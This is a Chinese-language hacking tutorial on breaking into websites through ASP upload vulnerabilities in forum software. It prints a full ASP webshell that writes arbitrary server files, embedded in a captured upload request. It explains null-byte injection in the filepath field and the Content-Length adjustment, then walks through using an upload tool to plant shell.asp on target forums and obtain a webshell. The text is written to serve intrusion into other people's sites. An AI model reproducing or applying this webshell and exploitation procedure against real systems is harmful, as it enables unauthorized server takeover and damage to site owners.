執行個體分析ASP上傳漏洞入侵實戰及擴充

【上傳漏洞欺騙技術】

　　網路上許多程式都有著上傳漏洞，比如任我飛揚整站程式、動感購物商城、秋葉商城、惠信新聞系統等。本文主要講解上傳漏洞的入侵實戰以及一些擴充利用。首先我們要獲得用戶端和伺服器之間傳遞的資料，事先準備好一個ASP木馬準備上傳，當然不可能成功，我們要的就是這中間我們向伺服器提交的資料。一般用WsockExpert來獲得資料，由於資料太多隻能把關鍵區段發出來如下：

　　POST /bbs/upfile.asp HTTP/1.1

　　……. 省略了N多沒用資訊

Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN
-----------------------------7d52191850242
Content-Disposition: form-data; name="filepath"

uploadFace
-----------------------------7d52191850242
Content-Disposition: form-data; name="act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"
Content-Type: text/plain

＜% dim objFSO %＞
＜% dim fdata %＞
＜% dim objCountFile %＞
＜% on error resume next %＞
＜% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %＞
＜% if Trim(request("syfdpath"))＜＞"" then %＞
＜% fdata = request("cyfddata") %＞
＜% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %＞
＜% objCountFile.Write fdata %＞
＜% if err =0 then %＞
＜% response.write "＜font color=red＞＜h2＞成功!＜/h2＞＜font＞" %＞
＜% else %＞
＜% response.write "＜font color=red＞＜h1＞失敗！＜/h1＞＜/font＞" %＞
＜% end if %＞
＜% err.clear %＞
＜% end if %＞
＜% objCountFile.Close %＞
＜% Set objCountFile=Nothing %＞
＜% Set objFSO = Nothing %＞
＜% Response.write "＜form action='''' method=post＞" %＞
＜% Response.write "儲存留言＜font color=red＞如D:\web\x.asp＜/font＞" %＞
＜% Response.Write "＜input type=text name=syfdpath width=32 size=50＞" %＞
＜% Response.Write "＜br＞" %＞
＜% Response.write "地址來自" %＞
＜% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %＞
＜% Response.write "＜br＞" %＞
＜% Response.write "你的留言:" %＞
＜% Response.write "＜textarea name=cyfddata cols=80 rows=10 width=32＞＜/textarea＞" %＞
＜% Response.write "＜input type=submit value=sky!!＞" %＞
＜% Response.write "＜/form＞" %＞

-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d52191850242--

　　傳遞的資訊我們擷取了，下面就來修改下達到欺騙目的。主要修改一下幾點：

　　1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"

　　2.Content-Disposition: form-data; name="fname"

　　E:\木馬\asp\shell.asp

　　3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp後面怎麼加一個Null 字元呢?用UltraEdit是個好方法,用16進位編輯,(因為''\0''這個字元也佔一個位置,所以我們先打入一空格,然後再在UltraEdit(用Ctrl+H轉換到16進位模式下)裡將就空格符的20改成00)。

　　4.還有一個地方也要修改，就是這句Content-Length: 1792表示提交資料的字元個數。

　　如果你修改了filepath的值那麼這個長度1792也要變換，一個字母或者數位長度就是1，不要忘記最後面那個空格那個也算１。

　　【上傳漏洞實戰】

　　我們就先用漏洞的鼻祖動網論壇來實戰下。從原理可以看到上傳的時侯還要修改資料，還要截包，所以網上出現了許多的工具。現在我們直接用老兵的上傳工具來把複雜的步驟變簡單，只要修改幾個資料就可以。我們來看下這個工具的介面，如1：

圖1 老兵上傳工具介面

　　我們來說下工具的用法：

　　Action中輸入存在上傳漏洞檔案的URL： http://target.net/bbs/UpFile.asp；UpPath裡第一個文字框中的FilePath即為表單中的FilePath，也就是上傳路徑，等號後面填的是上傳到對方伺服器上的後門的名稱/shell.asp；輸入一個WEB程式允許上傳的類型文字框中預設JPG就可以了（一般網站都允許上傳JPG圖片檔案）；File裡第一個文字框中的File1即是表單中的File1，等號後面填寫所要在本機上傳的木馬路徑；Cookies中填上我們用抓取資料包工具如WsockExpert抓取的Cookies值，記住最好是你在系統中註冊後的Cookies值。

　　這裡以我們入侵動網論壇為例，這裡Action：填入http://www.***.com/bbs/upfile.asp；UpPath第一個文字框填入：filepath；第二個填入：/shell.asp(你也可以寫/bbs/shell.asp這樣上傳成功後就傳到/bbs 目錄下了！)輸入一個WEB程式允許上傳的類型文字框中預設JPG就好了；File第一個文字框輸入：file1；第二個填入：E:\木馬\asp\shell.asp (這個ASP木馬是在自己機器上的路徑，點後面的檔案開啟表徵圖瀏覽找到ASP木馬即可。)

　　Cookies:這裡不用抓包了，因為這裡的上傳根本不檢測Cookie的哦。沒有它會報錯的如果都填寫好了直接按“Submit”按鍵提交！

圖2上傳成功提示

　　當點擊Submit按鈕後，最好用瀏覽器自己訪問下，程式也會有誤判的。我們用瀏覽器來訪問下。

圖3可以看到已經上傳成功了

　　下一步就是寫入一個功能強大的木馬來操作了，不再深入。

　　【上傳漏洞實戰擴充】

　　並不僅僅只有動網有上傳漏洞，在網路上許許多多的程式都有這個漏洞，上傳漏洞的原理一樣，掌握之後即可自由發揮，具體視程式碼而定。下面我們以喬客論壇為例為大家擴充一下上傳漏洞的應用。
首先註冊一個正常使用者並且登入，然後找到上傳頁面地址：http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_word查看源碼如下：
--------------------------------------------------------------------------------

＜FORM name=form1 action=?action=upfile method=post encType=multipart/form-data＞
＜INPUT type=hidden value=forum name=up_path＞
＜INPUT type=hidden value=200593075710 name=up_name＞
＜INPUT type=hidden value=jk_word name=up_text＞
＜INPUT type=file size=40 name=file_name1＞
＜INPUT type=submit value=點擊上傳 name=submit＞

--------------------------------------------------------------------------------

　　看到原始碼後，就應該知道老兵上傳工具裡邊我們該怎麼填寫了。
Action中輸入：http://192.168.1.3/3/upload.asp?action=upfile UpPath第一個文字框中輸入：up_name；第二個中輸入上傳後的SHELL名稱shell.asp；File 第一個文字框中輸入file_name1,第二個是原生木馬檔案。COOKIES這裡填寫抓包得到的COOKIES值，注意一定要填寫用WsockExpert抓取的Cookies資訊，其主要功能是用來驗證！

圖4設定

　　都設定好後點擊Submit按鈕，看到上傳成功了，開啟瀏覽器訪問一下看是否成功，

圖5上傳成功

　　至此已經成功的拿到webshell，就是這麼簡單，重要的是我們的思路要靈活，也要善於發現一個系統是否存在上傳漏洞。當然至於拿到webshell後你能做什麼，就看伺服器的安全配置以及你的個人水平了哦，這裡不做討論。